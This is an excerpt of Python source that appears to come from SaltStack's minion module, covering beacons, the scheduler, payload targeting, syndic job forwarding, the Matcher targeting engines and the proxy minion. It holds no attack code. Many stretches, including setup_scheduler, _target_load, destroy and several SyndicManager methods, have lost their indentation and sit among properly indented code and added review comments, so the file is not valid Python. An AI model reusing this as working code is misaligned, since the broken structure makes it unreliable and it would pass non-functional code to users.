        if 'beacons' not in self.periodic_callbacks:
            self.beacons = salt.beacons.Beacon(self.opts, self.functions)
            def handle_beacons():
                # Process Beacons
                beacons = None
                try:
                    beacons = self.process_beacons(self.functions)
                except Exception:
                    log.critical('The beacon errored: ', exc_info=True)
                if beacons and self.connected:
                    self._fire_master(events=beacons)
            new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
            if before_connect:
                # Make sure there is a chance for one iteration to occur before connect
                handle_beacons()
        if 'cleanup' not in self.periodic_callbacks:
            new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
        # start all the other callbacks
        for periodic_cb in six.itervalues(new_periodic_callbacks):
            periodic_cb.start()
        self.periodic_callbacks.update(new_periodic_callbacks)
def setup_scheduler(self, before_connect=False):
'''
Set up the scheduler.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'schedule' not in self.periodic_callbacks:
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_schedule()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
    # Main Minion Tune In
    def tune_in(self, start=True):
        '''
        Lock onto the publisher. This is the main event loop for the minion.

        :param bool start: when True, connect to the master and start the
            IO loop; when False, only wire up handlers (the caller owns the
            loop)
        :rtype : None
        '''
        self._pre_tune()
        log.debug('Minion \'%s\' trying to tune in', self.opts['id'])
        if start:
            # Optionally run beacons/scheduler once before connecting
            if self.opts.get('beacons_before_connect', False):
                self.setup_beacons(before_connect=True)
            if self.opts.get('scheduler_before_connect', False):
                self.setup_scheduler(before_connect=True)
            self.sync_connect_master()
        if self.connected:
            self._fire_master_minion_start()
            log.info('Minion is ready to receive requests!')
        # Make sure to gracefully handle SIGUSR1
        enable_sigusr1_handler()
        # Make sure to gracefully handle CTRL_LOGOFF_EVENT
        if HAS_WIN_FUNCTIONS:
            salt.utils.win_functions.enable_ctrl_logoff_handler()
        # On first startup execute a state run if configured to do so
        self._state_run()
        self.setup_beacons()
        self.setup_scheduler()
        # schedule the stuff that runs every interval
        ping_interval = self.opts.get('ping_interval', 0) * 60
        if ping_interval > 0 and self.connected:
            def ping_master():
                try:
                    def ping_timeout_handler(*_):
                        if self.opts.get('auth_safemode', False):
                            log.error('** Master Ping failed. Attempting to restart minion**')
                            delay = self.opts.get('random_reauth_delay', 5)
                            log.info('delaying random_reauth_delay %ss', delay)
                            # regular sys.exit raises an exception -- which isn't sufficient in a thread
                            os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
                    self._fire_master('ping', 'minion_ping', sync=False, timeout_handler=ping_timeout_handler)
                except Exception:
                    log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
            self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
            self.periodic_callbacks['ping'].start()
        # add handler to subscriber
        if hasattr(self, 'pub_channel') and self.pub_channel is not None:
            self.pub_channel.on_recv(self._handle_payload)
        elif self.opts.get('master_type') != 'disable':
            log.error('No connection to master found. Scheduled jobs will not run.')
        if start:
            try:
                self.io_loop.start()
                if self.restart:
                    self.destroy()
            except (KeyboardInterrupt, RuntimeError):  # A RuntimeError can be re-raised by Tornado on shutdown
                self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when minion sees something it shouldnt
log.trace(
'Broadcast message received not for this minion, Load: %s',
payload['load']
)
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
    def __del__(self):
        # Ensure resources are released even if destroy() was never called.
        self.destroy()
class Syndic(Minion):
    '''
    Make a Syndic minion, this minion will use the minion keys on the
    master to authenticate with a higher level master.
    '''
    def __init__(self, opts, **kwargs):
        '''
        :param dict opts: syndic options; mutated to force safe-mode auth
            and a 1-second loop interval before the Minion init runs
        '''
        self._syndic_interface = opts.get('interface')
        self._syndic = True
        # force auth_safemode True because Syndic don't support autorestart
        opts['auth_safemode'] = True
        opts['loop_interval'] = 1
        super(Syndic, self).__init__(opts, **kwargs)
        # Minion-of-the-local-master used to access its modules/returners
        self.mminion = salt.minion.MasterMinion(opts)
        # jids recently forwarded, to avoid forwarding duplicates
        self.jid_forward_cache = set()
        self.jids = {}
        self.raw_events = []
        self.pub_future = None
    def _handle_decoded_payload(self, data):
        '''
        Override this method if you wish to handle the decoded data
        differently.
        '''
        # TODO: even do this??
        # Decrement the hop count before forwarding downstream.
        data['to'] = int(data.get('to', self.opts['timeout'])) - 1
        # Only forward the command if it didn't originate from ourselves
        # NOTE(review): the asymmetric defaults (0 vs 1) make the comparison
        # unequal — and thus forward — when master_id is absent on either
        # side; confirm that is the intended behavior.
        if data.get('master_id', 0) != self.opts.get('master_id', 1):
            self.syndic_cmd(data)
    def syndic_cmd(self, data):
        '''
        Take the now clear load and forward it on to the client cmd
        '''
        # Set up default tgt_type
        if 'tgt_type' not in data:
            data['tgt_type'] = 'glob'
        kwargs = {}
        # optionally add a few fields to the publish data
        for field in ('master_id',  # which master the job came from
                      'user',  # which user ran the job
                      ):
            if field in data:
                kwargs[field] = data[field]
        def timeout_handler(*args):
            # NOTE(review): args[1] raises IndexError if the handler is ever
            # invoked with fewer than two arguments — confirm the expected
            # callback signature.
            log.warning('Unable to forward pub data: %s', args[1])
            return True
        with tornado.stack_context.ExceptionStackContext(timeout_handler):
            self.local.pub_async(data['tgt'],
                                 data['fun'],
                                 data['arg'],
                                 data['tgt_type'],
                                 data['ret'],
                                 data['jid'],
                                 data['to'],
                                 io_loop=self.io_loop,
                                 callback=lambda _: None,
                                 **kwargs)
    def fire_master_syndic_start(self):
        '''
        Send the start event(s) to the higher-level master announcing that
        this syndic is live.
        '''
        # Send an event to the master that the minion is live
        if self.opts['enable_legacy_startup_events']:
            # old style event. Defaults to false in Neon Salt release.
            self._fire_master(
                'Syndic {0} started at {1}'.format(
                    self.opts['id'],
                    time.asctime()
                ),
                'syndic_start',
                sync=False,
            )
        # Namespaced event tag: syndic/<id>/start
        self._fire_master(
            'Syndic {0} started at {1}'.format(
                self.opts['id'],
                time.asctime()
            ),
            tagify([self.opts['id'], 'start'], 'syndic'),
            sync=False,
        )
    # TODO: clean up docs
    def tune_in_no_block(self):
        '''
        Executes the tune_in sequence but omits extra logging and the
        management of the event bus assuming that these are handled outside
        the tune_in sequence
        '''
        # Instantiate the local client
        self.local = salt.client.get_local_client(
            self.opts['_minion_conf_file'], io_loop=self.io_loop)
        # add handler to subscriber
        self.pub_channel.on_recv(self._process_cmd_socket)
    def _process_cmd_socket(self, payload):
        '''
        Handle a publication from the upstream master; only verified (AES)
        payloads are processed.
        '''
        if payload is not None and payload['enc'] == 'aes':
            log.trace('Handling payload')
            self._handle_decoded_payload(payload['load'])
        # If it's not AES, and thus has not been verified, we do nothing.
        # In the future, we could add support for some clearfuncs, but
        # the syndic currently has no need.
    @tornado.gen.coroutine
    def reconnect(self):
        '''
        Tear down the current publish channel and re-authenticate with a
        master; returns this syndic as the coroutine result.
        '''
        if hasattr(self, 'pub_channel'):
            self.pub_channel.on_recv(None)
            if hasattr(self.pub_channel, 'close'):
                self.pub_channel.close()
            del self.pub_channel
        # if eval_master finds a new master for us, self.connected
        # will be True again on successful master authentication
        master, self.pub_channel = yield self.eval_master(opts=self.opts)
        if self.connected:
            self.opts['master'] = master
            self.pub_channel.on_recv(self._process_cmd_socket)
            log.info('Minion is ready to receive requests!')
        raise tornado.gen.Return(self)
    def destroy(self):
        '''
        Tear down the syndic minion
        '''
        # We borrowed the local clients poller so give it back before
        # it's destroyed. Reset the local poller reference.
        super(Syndic, self).destroy()
        if hasattr(self, 'local'):
            del self.local
        if hasattr(self, 'forward_events'):
            self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
    def __init__(self, opts, io_loop=None):
        '''
        :param dict opts: syndic options (mutated: loop_interval forced to 1)
        :param io_loop: IO loop to run on; a ZMQ-compatible default loop is
            created when not supplied
        '''
        opts['loop_interval'] = 1
        super(SyndicManager, self).__init__(opts)
        self.mminion = salt.minion.MasterMinion(opts)
        # sync (old behavior), cluster (only returns and publishes)
        self.syndic_mode = self.opts.get('syndic_mode', 'sync')
        self.syndic_failover = self.opts.get('syndic_failover', 'random')
        self.auth_wait = self.opts['acceptance_wait_time']
        self.max_auth_wait = self.opts['acceptance_wait_time_max']
        # Set once any master connection succeeds
        self._has_master = threading.Event()
        # jids recently forwarded, to avoid forwarding duplicates
        self.jid_forward_cache = set()
        if io_loop is None:
            install_zmq()
            self.io_loop = ZMQDefaultLoop.current()
        else:
            self.io_loop = io_loop
        # List of events
        self.raw_events = []
        # Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
        self.job_rets = {}
        # List of delayed job_rets which was unable to send for some reason and will be resend to
        # any available master
        self.delayed = []
        # Active pub futures: {master_id: (future, [job_ret, ...]), ...}
        self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
    '''
    Create a syndic, and asynchronously connect it to a master.

    Retries forever with a growing back-off (capped at
    ``acceptance_wait_time_max``) until the master answers; only a
    KeyboardInterrupt breaks out of the retry loop.

    :param dict opts: opts with 'master' already set to the target master
    :returns: the connected Syndic (via tornado.gen.Return)
    '''
    last = 0  # never have we signed in  # NOTE(review): assigned but never read
    auth_wait = opts['acceptance_wait_time']
    failed = False
    while True:
        log.debug(
            'Syndic attempting to connect to %s',
            opts['master']
        )
        try:
            syndic = Syndic(opts,
                            timeout=self.SYNDIC_CONNECT_TIMEOUT,
                            safe=False,
                            io_loop=self.io_loop,
                            )
            yield syndic.connect_master(failed=failed)
            # set up the syndic to handle publishes (specifically not event forwarding)
            syndic.tune_in_no_block()
            # Send an event to the master that the minion is live
            syndic.fire_master_syndic_start()
            log.info(
                'Syndic successfully connected to %s',
                opts['master']
            )
            break
        except SaltClientError as exc:
            failed = True
            log.error(
                'Error while bringing up syndic for multi-syndic. Is the '
                'master at %s responding?', opts['master']
            )
            last = time.time()
            # Back off a little more each failure, up to the configured cap
            if auth_wait < self.max_auth_wait:
                auth_wait += self.auth_wait
            yield tornado.gen.sleep(auth_wait)  # TODO: log?
        except KeyboardInterrupt:
            raise
        except:  # pylint: disable=W0702
            # Unknown failure: mark as failed and retry immediately
            failed = True
            log.critical(
                'Unexpected error while connecting to %s',
                opts['master'], exc_info=True
            )
    raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
# TODO: debug?
log.info(
'Attempting to mark %s as dead, although it is already '
'marked dead', master
)
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
successful = False
# Call for each master
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
successful = True
except SaltClientError:
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
if not successful:
log.critical('Unable to call %s on any masters!', func)
def _return_pub_syndic(self, values, master_id=None):
    '''
    Wrapper to call '_return_pub_multi' on a syndic, best effort to get the
    one you asked for.

    Tracks one in-flight publish future per master in ``self.pub_futures``;
    data attached to a failed future is moved to ``self.delayed`` for a
    later retry on any master.

    :returns: True once the payload was handed to some master's syndic,
              False if it could not be sent yet (caller retries later)
    '''
    func = '_return_pub_multi'
    for master, syndic_future in self.iter_master_options(master_id):
        # Skip masters whose sign-in has not finished or has failed
        if not syndic_future.done() or syndic_future.exception():
            log.error(
                'Unable to call %s on %s, that syndic is not connected',
                func, master
            )
            continue
        future, data = self.pub_futures.get(master, (None, None))
        if future is not None:
            if not future.done():
                if master == master_id:
                    # Targeted master previous send not done yet, call again later
                    return False
                else:
                    # Fallback master is busy, try the next one
                    continue
            elif future.exception():
                # Previous execution on this master returned an error
                log.error(
                    'Unable to call %s on %s, trying another...',
                    func, master
                )
                self._mark_master_dead(master)
                del self.pub_futures[master]
                # Add not sent data to the delayed list and try the next master
                self.delayed.extend(data)
                continue
        future = getattr(syndic_future.result(), func)(values,
                                                       '_syndic_return',
                                                       timeout=self._return_retry_timer(),
                                                       sync=False)
        self.pub_futures[master] = (future, values)
        return True
    # Loop done and didn't exit: wasn't sent, try again later
    return False
def iter_master_options(self, master_id=None):
    '''
    Iterate (in order) over your options for master

    Yields ``(master, syndic_future)`` pairs. When ``master_id`` names a
    known master it is yielded first; with ``syndic_failover: random`` the
    remaining candidates are shuffled.
    '''
    remaining = list(self._syndics.keys())
    if self.opts['syndic_failover'] == 'random':
        shuffle(remaining)
    if master_id in self._syndics:
        # Requested master goes first; keep the rest as fallbacks
        remaining.remove(master_id)
    else:
        master_id = remaining.pop(0)
    while True:
        yield master_id, self._syndics[master_id]
        if not remaining:
            return
        master_id = remaining.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
    '''
    Re-register the event handler on the local event bus and watch the
    resulting future so the handler is re-armed again if it ever resolves.
    (``something`` is the completed future passed in by the IO loop and is
    intentionally ignored.)
    '''
    handler_future = self.local.event.set_event_handler(self._process_event)
    self.io_loop.add_future(handler_future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
    '''
    Lock onto the publisher. This is the main event loop for the syndic.

    Spawns the per-master syndic connections, wires the local event bus
    into ``_process_event``, schedules periodic event forwarding, and then
    runs the IO loop forever (this call blocks).
    '''
    self._spawn_syndics()
    # Instantiate the local client
    self.local = salt.client.get_local_client(
        self.opts['_minion_conf_file'], io_loop=self.io_loop)
    self.local.event.subscribe('')
    log.debug('SyndicManager \'%s\' trying to tune in', self.opts['id'])
    # register the event sub to the poller
    # (_reset_event_aggregation initializes job_rets/raw_events; the
    # previous direct assignments duplicating it were dead code and removed)
    self._reset_event_aggregation()
    future = self.local.event.set_event_handler(self._process_event)
    self.io_loop.add_future(future, self.reconnect_event_bus)
    # forward events every syndic_event_forward_timeout
    self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
                                                          self.opts['syndic_event_forward_timeout'] * 1000,
                                                          io_loop=self.io_loop)
    self.forward_events.start()
    # Make sure to gracefully handle SIGUSR1
    enable_sigusr1_handler()
    self.io_loop.start()
def _process_event(self, raw):
    '''
    Aggregate one event off the local bus.

    Job-return events are bucketed into ``self.job_rets`` per originating
    master and tag; other events are buffered in ``self.raw_events`` (sync
    mode only). _forward_events() later flushes both upstream.
    '''
    # TODO: cleanup: Move down into event class
    mtag, data = self.local.event.unpack(raw, self.local.event.serial)
    log.trace('Got event %s', mtag)  # pylint: disable=no-member
    tag_parts = mtag.split('/')
    # Job return tags look like: salt/job/<jid>/ret/<minion_id>
    if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
            salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
            'return' in data:
        if 'jid' not in data:
            # Not a job return
            return
        # Differing defaults (0 vs 1) make missing master_id keys NOT match
        if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
            log.debug('Return received with matching master_id, not forwarding')
            return
        master = data.get('master_id')
        jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
        if not jdict:
            # First return seen for this tag: record job metadata once
            jdict['__fun__'] = data.get('fun')
            jdict['__jid__'] = data['jid']
            jdict['__load__'] = {}
            fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
            # Only need to forward each load once. Don't hit the disk
            # for every minion return!
            if data['jid'] not in self.jid_forward_cache:
                jdict['__load__'].update(
                    self.mminion.returners[fstr](data['jid'])
                )
                self.jid_forward_cache.add(data['jid'])
                if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
                    # Pop the oldest jid from the cache
                    # (jids sort chronologically, so min == oldest)
                    tmp = sorted(list(self.jid_forward_cache))
                    tmp.pop(0)
                    self.jid_forward_cache = set(tmp)
        if master is not None:
            # __'s to make sure it doesn't print out on the master cli
            jdict['__master_id__'] = master
        # Keep only the keys the upstream master needs from this return
        ret = {}
        for key in 'return', 'retcode', 'success':
            if key in data:
                ret[key] = data[key]
        jdict[data['id']] = ret
    else:
        # TODO: config to forward these? If so we'll have to keep track of who
        # has seen them
        # if we are the top level masters-- don't forward all the minion events
        if self.syndic_mode == 'sync':
            # Add generic event aggregation here
            if 'retcode' not in data:
                self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
    '''
    Periodic callback: flush aggregated events and job returns upstream.

    Raw events are fired to ALL masters; buffered/delayed job returns are
    published best-effort and only cleared once a master accepted them.
    '''
    log.trace('Forwarding events')  # pylint: disable=no-member
    if self.raw_events:
        # Swap the buffer out first so new events can accumulate while
        # we forward this batch
        events = self.raw_events
        self.raw_events = []
        self._call_syndic('_fire_master',
                          kwargs={'events': events,
                                  'pretag': tagify(self.opts['id'], base='syndic'),
                                  'timeout': self._return_retry_timer(),
                                  'sync': False,
                                  },
                          )
    if self.delayed:
        # Retry returns that previously failed to send, on any master
        res = self._return_pub_syndic(self.delayed)
        if res:
            self.delayed = []
    # Forward per-master job returns back to the master that asked for them
    for master in list(six.iterkeys(self.job_rets)):
        values = list(six.itervalues(self.job_rets[master]))
        res = self._return_pub_syndic(values, master_id=master)
        if res:
            del self.job_rets[master]
class Matcher(object):
    '''
    Use to return the value for matching calls from the master

    Each ``<engine>_match`` method implements one targeting engine and
    returns a bool (``ipcidr_match`` may return ``[]`` on invalid input;
    see the note there).
    '''
    def __init__(self, opts, functions=None):
        # opts: minion configuration (reads 'id', 'grains', 'pillar', ...)
        # functions: loaded execution modules; lazily loaded by data_match
        # when None
        self.opts = opts
        self.functions = functions

    def confirm_top(self, match, data, nodegroups=None):
        '''
        Takes the data passed to a top file environment and determines if the
        data matches this minion
        '''
        matcher = 'compound'
        if not data:
            log.error('Received bad data when setting the match from the top '
                      'file')
            return False
        # Honor an explicit 'match' entry (the last one wins if repeated)
        for item in data:
            if isinstance(item, dict):
                if 'match' in item:
                    matcher = item['match']
        if hasattr(self, matcher + '_match'):
            funcname = '{0}_match'.format(matcher)
            if matcher == 'nodegroup':
                # Nodegroup matching also needs the nodegroups mapping
                return getattr(self, funcname)(match, nodegroups)
            return getattr(self, funcname)(match)
        else:
            log.error('Attempting to match with unknown matcher: %s', matcher)
            return False

    def glob_match(self, tgt):
        '''
        Returns true if the passed glob matches the id
        '''
        if not isinstance(tgt, six.string_types):
            return False
        return fnmatch.fnmatch(self.opts['id'], tgt)

    def pcre_match(self, tgt):
        '''
        Returns true if the passed pcre regex matches
        '''
        return bool(re.match(tgt, self.opts['id']))

    def list_match(self, tgt):
        '''
        Determines if this host is on the list
        '''
        # A comma-delimited string is treated as a list of ids
        if isinstance(tgt, six.string_types):
            tgt = tgt.split(',')
        return bool(self.opts['id'] in tgt)

    def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
        '''
        Reads in the grains glob match
        '''
        log.debug('grains target: %s', tgt)
        if delimiter not in tgt:
            log.error('Got insufficient arguments for grains match '
                      'statement from master')
            return False
        return salt.utils.data.subdict_match(
            self.opts['grains'], tgt, delimiter=delimiter
        )

    def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
        '''
        Matches a grain based on regex
        '''
        log.debug('grains pcre target: %s', tgt)
        if delimiter not in tgt:
            log.error('Got insufficient arguments for grains pcre match '
                      'statement from master')
            return False
        return salt.utils.data.subdict_match(
            self.opts['grains'], tgt, delimiter=delimiter, regex_match=True)

    def data_match(self, tgt):
        '''
        Match based on the local data store on the minion
        '''
        # Lazily load execution modules so data.getval is available
        if self.functions is None:
            utils = salt.loader.utils(self.opts)
            self.functions = salt.loader.minion_mods(self.opts, utils=utils)
        comps = tgt.split(':')
        if len(comps) < 2:
            return False
        val = self.functions['data.getval'](comps[0])
        if val is None:
            # The value is not defined
            return False
        if isinstance(val, list):
            # We are matching a single component to a single list member
            for member in val:
                if fnmatch.fnmatch(six.text_type(member).lower(), comps[1].lower()):
                    return True
            return False
        if isinstance(val, dict):
            if comps[1] in val:
                return True
            return False
        return bool(fnmatch.fnmatch(
            val,
            comps[1],
        ))

    def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
        '''
        Reads in the pillar glob match
        '''
        log.debug('pillar target: %s', tgt)
        if delimiter not in tgt:
            log.error('Got insufficient arguments for pillar match '
                      'statement from master')
            return False
        return salt.utils.data.subdict_match(
            self.opts['pillar'], tgt, delimiter=delimiter
        )

    def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
        '''
        Reads in the pillar pcre match
        '''
        log.debug('pillar PCRE target: %s', tgt)
        if delimiter not in tgt:
            log.error('Got insufficient arguments for pillar PCRE match '
                      'statement from master')
            return False
        return salt.utils.data.subdict_match(
            self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
        )

    def pillar_exact_match(self, tgt, delimiter=':'):
        '''
        Reads in the pillar match, no globbing, no PCRE
        '''
        log.debug('pillar target: %s', tgt)
        if delimiter not in tgt:
            log.error('Got insufficient arguments for pillar match '
                      'statement from master')
            return False
        return salt.utils.data.subdict_match(self.opts['pillar'],
                                             tgt,
                                             delimiter=delimiter,
                                             exact_match=True)

    def ipcidr_match(self, tgt):
        '''
        Matches based on IP address or CIDR notation
        '''
        try:
            # Target is an address?
            tgt = ipaddress.ip_address(tgt)
        except:  # pylint: disable=bare-except
            try:
                # Target is a network?
                tgt = ipaddress.ip_network(tgt)
            except:  # pylint: disable=bare-except
                log.error('Invalid IP/CIDR target: %s', tgt)
                # NOTE(review): returns [] rather than False on bad input;
                # callers appear to rely only on falsiness
                return []
        proto = 'ipv{0}'.format(tgt.version)
        grains = self.opts['grains']
        if proto not in grains:
            match = False
        elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
            match = six.text_type(tgt) in grains[proto]
        else:
            match = salt.utils.network.in_subnet(tgt, grains[proto])
        return match

    def range_match(self, tgt):
        '''
        Matches based on range cluster
        '''
        if HAS_RANGE:
            range_ = seco.range.Range(self.opts['range_server'])
            try:
                return self.opts['grains']['fqdn'] in range_.expand(tgt)
            except seco.range.RangeException as exc:
                log.debug('Range exception in compound match: %s', exc)
                return False
        return False

    def compound_match(self, tgt):
        '''
        Runs the compound target check

        Translates each word of the expression into True/False via the
        engine methods above, then evaluates the resulting boolean string.
        '''
        if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
            log.error('Compound target received that is neither string, list nor tuple')
            return False
        log.debug('compound_match: %s ? %s', self.opts['id'], tgt)
        # One-letter engine prefixes -> engine method name
        ref = {'G': 'grain',
               'P': 'grain_pcre',
               'I': 'pillar',
               'J': 'pillar_pcre',
               'L': 'list',
               'N': None,      # Nodegroups should already be expanded
               'S': 'ipcidr',
               'E': 'pcre'}
        if HAS_RANGE:
            ref['R'] = 'range'
        results = []
        opers = ['and', 'or', 'not', '(', ')']
        if isinstance(tgt, six.string_types):
            words = tgt.split()
        else:
            words = tgt
        for word in words:
            target_info = salt.utils.minions.parse_target(word)
            # Easy check first
            if word in opers:
                if results:
                    if results[-1] == '(' and word in ('and', 'or'):
                        log.error('Invalid beginning operator after "(": %s', word)
                        return False
                    if word == 'not':
                        # Insert an implicit 'and' before a bare 'not'
                        if not results[-1] in ('and', 'or', '('):
                            results.append('and')
                    results.append(word)
                else:
                    # seq start with binary oper, fail
                    if word not in ['(', 'not']:
                        log.error('Invalid beginning operator: %s', word)
                        return False
                    results.append(word)
            elif target_info and target_info['engine']:
                if 'N' == target_info['engine']:
                    # Nodegroups should already be expanded/resolved to other engines
                    log.error(
                        'Detected nodegroup expansion failure of "%s"', word)
                    return False
                engine = ref.get(target_info['engine'])
                if not engine:
                    # If an unknown engine is called at any time, fail out
                    log.error(
                        'Unrecognized target engine "%s" for target '
                        'expression "%s"', target_info['engine'], word
                    )
                    return False
                engine_args = [target_info['pattern']]
                engine_kwargs = {}
                if target_info['delimiter']:
                    engine_kwargs['delimiter'] = target_info['delimiter']
                # Record the engine result as the string 'True'/'False'
                results.append(
                    six.text_type(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
                )
            else:
                # The match is not explicitly defined, evaluate it as a glob
                results.append(six.text_type(self.glob_match(word)))
        results = ' '.join(results)
        log.debug('compound_match %s ? "%s" => "%s"', self.opts['id'], tgt, results)
        try:
            # Input is built only from True/False and the operators above
            return eval(results)  # pylint: disable=W0123
        except Exception:
            log.error(
                'Invalid compound target: %s for results: %s', tgt, results)
            return False
        return False  # NOTE(review): unreachable (both branches above return)

    def nodegroup_match(self, tgt, nodegroups):
        '''
        This is a compatibility matcher and is NOT called when using
        nodegroups for remote execution, but is called when the nodegroups
        matcher is used in states
        '''
        if tgt in nodegroups:
            return self.compound_match(
                salt.utils.minions.nodegroup_comp(tgt, nodegroups)
            )
        return False
class ProxyMinionManager(MinionManager):
    '''
    Create the multi-minion interface but for proxy minions
    '''
    def _create_minion_object(self, opts, timeout, safe,
                              io_loop=None, loaded_base_name=None,
                              jid_queue=None):
        '''
        Factory hook: build the minion object appropriate for this manager,
        i.e. a ProxyMinion instead of a regular Minion.
        '''
        minion = ProxyMinion(
            opts, timeout, safe,
            io_loop=io_loop,
            loaded_base_name=loaded_base_name,
            jid_queue=jid_queue,
        )
        return minion
class ProxyMinion(Minion):
    '''
    This class instantiates a 'proxy' minion--a minion that does not manipulate
    the host it runs on, but instead manipulates a device that cannot run a minion.
    '''

    # TODO: better name...
    @tornado.gen.coroutine
    def _post_master_init(self, master):
        '''
        Function to finish init after connecting to a master

        This is primarily loading modules, pillars, etc. (since they need
        to know which master they connected to)

        If this function is changed, please check Minion._post_master_init
        to see if those changes need to be propagated.

        ProxyMinions need a significantly different post master setup,
        which is why the differences are not factored out into separate helper
        functions.
        '''
        log.debug("subclassed _post_master_init")
        if self.connected:
            self.opts['master'] = master
